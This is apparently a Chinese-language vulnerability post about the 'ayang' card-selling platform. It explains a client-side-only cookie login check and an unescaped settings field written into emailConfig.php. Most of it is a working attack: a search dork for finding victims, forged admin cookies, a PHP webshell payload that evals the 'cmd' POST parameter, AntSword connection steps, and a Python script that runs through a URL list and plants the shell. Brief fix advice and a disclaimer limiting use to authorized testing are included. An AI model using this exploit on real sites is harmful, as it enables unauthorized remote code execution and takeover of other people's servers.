

ayang发卡平台getshell

漏洞搜索

inurl:admin/set.php

漏洞原因

  1. admin 后台页面(如 /admin/set.php)只在客户端用 JavaScript 校验 cookie:条件仅为 loginInfo 等于 md5(pass),而 user、pass、loginInfo 三个 cookie 都由请求方自行设置,服务端没有会话校验,因此伪造 cookie 即可绕过登录并查看管理员密码
  2. 后台"发件邮箱设置"(mod=sfEmail)把 POST 字段未经任何转义直接拼入 PHP 源码,并写入网站根目录下的 emailConfig.php,构成任意 PHP 代码写入(可直接执行)。修复思路:登录改为服务端会话鉴权;配置不要以可执行 PHP 形式由用户输入生成(改存为 JSON/ini 并放在 web 根之外),至少也要对各字段做 var_export 级别的转义

漏洞代码

/admin/set.php

登录校验代码(客户端 JavaScript,只检查 cookie,不经过服务端)

if($.cookie("user") == null || $.cookie("user") == "" || $.cookie("loginInfo") != $.md5($.cookie("pass"))){
    	window.location.href='./login.php';
    }else{
    }

任意文件写入代码(/admin/set.php 中 mod=sfEmail 分支;各 $_POST 字段未转义直接拼入 PHP 源码)

elseif($_GET['mod']=="sfEmail"){
    if($_POST['host'] == "" || $_POST['port'] == "" || $_POST['user'] == "" || $_POST['from'] == ""){
        showmsg("重要信息不能为空!");
        exit();
    }
     $text="<?php
 \$emailConfig = array(
  'host'=>'".$_POST['host']."',//邮箱的服务器地址
  'fromName'=>'".$_POST['fromName']."',//设置发件人姓名(昵称) 任意内容
  'port'=>'".$_POST['port']."',//端口
  'user'=>'".$_POST['user']."',//邮箱账号
  'pwd'=>'".$_POST['pwd']."',//邮箱密码
  'from'=>'".$_POST['from']."',//设置发件人邮箱地址 这里填入上述提到的“发件人邮箱”
  'title'=>'".$_POST['title']."'//添加该邮件的主题
  );
?>
";
     saveFile("../emailConfig.php",$text);
     showmsg("ok!",1);
 }

漏洞利用

  1. 添加cookies:

    COOKIES = {
                "user": "admin",
                "pass": "admin",
                "loginInfo": "21232f297a57a5a743894a0e4a801fc3"
                }
  2. 带上述 cookie 访问 http://domain/admin/set.php?mod=admin,页面中即显示管理员密码(loginInfo 就是 pass 的 md5,三个值都由客户端给出,无需真实登录)

  3. 进入 系统设置->发件邮箱设置->邮件标题

    a');$x=&$y; $y=$_POST['cmd']; function a() {     global $x;     return $x; } eval(a());?>/*
  4. 之后用蚁剑连接 http://domain/emailConfig.php,连接密码为 cmd(即上面 payload 中 eval 所读取的 POST 参数名)

漏洞EXP【py】

# encode=utf-8
# search inurl:admin.php
import hashlib
import re

import pyfiglet
import requests
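# Forged login cookies accepted by the admin page's client-side check: the
# JavaScript in set.php only redirects to login.php when the "loginInfo"
# cookie differs from md5 of the "pass" cookie, and all three cookies are
# supplied by the client, so any user/pass pair with a matching md5 passes.
# Deriving loginInfo here keeps the three values consistent if the
# placeholder credentials are ever changed (md5("admin") is
# 21232f297a57a5a743894a0e4a801fc3, the literal the original hard-coded).
_COOKIE_PASS = "admin"
COOKIES = {
    "user": "admin",
    "pass": _COOKIE_PASS,
    "loginInfo": hashlib.md5(_COOKIE_PASS.encode("utf-8")).hexdigest(),
}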
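def geturls():
    """Return the raw lines of ``url.list`` (one target per line, newline kept).

    The file is read as UTF-8 explicitly so the result does not depend on the
    locale encoding of the machine running the script.  Lines are returned
    exactly as readlines() yields them -- trailing "\\n" included -- because
    the callers strip or prefix-test them themselves.

    Raises:
        FileNotFoundError: when url.list is not in the working directory.
    """
    with open("url.list", encoding="utf-8") as url_file:
        return url_file.readlines()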
def check(url):
    """POST /admin/set.php?mod=admin with the forged cookies and dump the body.

    One request to ``<url>/admin/set.php?mod=admin`` carrying COOKIES.  On
    HTTP 200 the entire response text is printed for manual inspection; any
    other status ends the process through exit(), which -- when this runs
    inside mainf()'s loop -- also abandons every remaining target.  Note that
    a 200 is not evidence of exposure by itself: the login check shown above
    is client-side JavaScript, so presumably the server serves this page to
    anyone, vulnerable or not.  The request carries no timeout.

    Args:
        url: base URL of the target; surrounding whitespace/newline is stripped.
    """
    target = url.strip() + "/admin/set.php?mod=admin"
    response = requests.post(target, cookies=COOKIES)
    if response.status_code != 200:
        exit("Got password failed")
    print("[+]Getting password")
    print(response.text)
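def getpass(text):
    """Print "user : password" scraped from the admin page body, or exit.

    Both patterns are kept exactly as the original author left them and are
    effectively placeholders: r'' matches the empty string at offset 0 of any
    input, and r'管理员密码{30,50}' matches the literal text 管理员密 followed by
    30-50 repetitions of 码 -- not a password -- so against real output this
    function always exits.  The page markup is not shown in this listing, so no
    correct pattern can be derived here; adjust both to the target's HTML before
    relying on it.  The original concatenated the Match objects directly, which
    raises TypeError whenever both patterns do match; the matched text is now
    taken with group(0).

    Args:
        text: response body of /admin/set.php?mod=admin.
    Raises:
        SystemExit: via exit() when either pattern finds no match.
    """
    user = re.search(r'', text)
    pwd = re.search(r'管理员密码{30,50}', text)
    if user is None or pwd is None:
        exit("[-]Cant't find pass!")
    print(user.group(0) + " : " + pwd.group(0))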
def banner():
    """Render the tool name as green ASCII art on stdout via pyfiglet."""
    title = "f a k a p a s s"
    pyfiglet.print_figlet(title, colors="GREEN")
def write_shell(url):
    """Submit the sfEmail form with PHP in ``title``, then probe the result.

    The server-side branch (see the PHP listing above) copies every POST field
    into PHP source text without escaping and saves it as ../emailConfig.php,
    i.e. into the site root next to admin/.  The ``title`` value below closes
    the single-quoted array entry early and appends code that eval()s
    $_POST['cmd']; the trailing ``?>`` leaves PHP mode, so the remainder of
    the generated template is emitted as plain text rather than parsed.
    Unlike check(), ``url`` is used as given -- no strip() -- so a line read
    straight from url.list still carries its newline.  Neither request has a
    timeout.  HTTP 200 on the POST is treated as success, but whether the
    showmsg() error path also answers 200 is not visible from this listing.

    Args:
        url: base URL of the target (used verbatim).
    Raises:
        SystemExit: via exit() when the POST does not return 200.
    """
    purl = url + "/admin/set.php?mod=sfEmail"
    # Keys mirror the $_POST fields read by the sfEmail branch; host, port,
    # user and from must be non-empty or the server rejects the form.
    data = {
            "host": "smtp.163.com",
            "fromName": "个人发卡平台",
            "port": "25",
            "user": "706672193",
            "pwd": "706672193",
            "from": "706672193@qq.com",
            "title": "a');$x=&$y; $y=$_POST['cmd']; function a() {     global $x;     return $x; } eval(a());?>/*",
            "submit": "修改"
            }
    res = requests.post(purl, data=data, cookies=COOKIES)
    if res.status_code == 200:
        print("[+]Write shell successfully!")
    else:
        print("[-]Write shell failed!")
        exit("exited")
    # Second request only checks that emailConfig.php is served from the root;
    # it sends no command and does not confirm the payload actually landed.
    res = requests.get(url+"/emailConfig.php")
    if res.status_code == 200:
        print("[+]Shell path : "+url+"/emailConfig.php")
        print("[+]Shell password : cmd")
    else:
        print("[-]Shell path is changed !")
def mainf(isw=0):
    """Entry point: print the banner, then probe each target in url.list.

    For every line of url.list: lines beginning with '#' are skipped, a line
    without an http:// or https:// prefix gets http:// prepended, the URL is
    echoed and check() is run on it.  Only after the loop has finished, and
    only when ``isw`` is non-zero, is write_shell() called -- once, with
    whatever ``url`` was bound last (the file's final line, even one that was
    skipped, still carrying the trailing newline that readlines() leaves on
    it, since nothing here strips it).  That control flow is the original's
    and is kept unchanged.

    Args:
        isw: non-zero to run the write step after the probing loop.
    Raises:
        UnboundLocalError: if url.list is empty and isw is non-zero.
        SystemExit: propagated from check() / write_shell().
    """
    banner()
    for url in geturls():
        if url[0] == "#":
            continue
        if not url.startswith(("http://", "https://")):
            url = "http://" + url
        print("URL:" + url)
        check(url)
    if isw != 0:
        write_shell(url)
if __name__ == "__main__":
    # Run with the write step enabled (isw != 0); see mainf().
    mainf(isw=1)

目标 URL 写在脚本同目录的 url.list 文件中,每行一个;以 # 开头的行会被跳过,未写协议的行默认补上 http://。

部分站点已修复该漏洞,脚本对这些目标会失败(脚本把任何 HTTP 200 都当作成功,并不能真正判断是否存在漏洞)。以上内容仅用于授权渗透测试与防御研究;未经授权对他人系统使用属违法行为。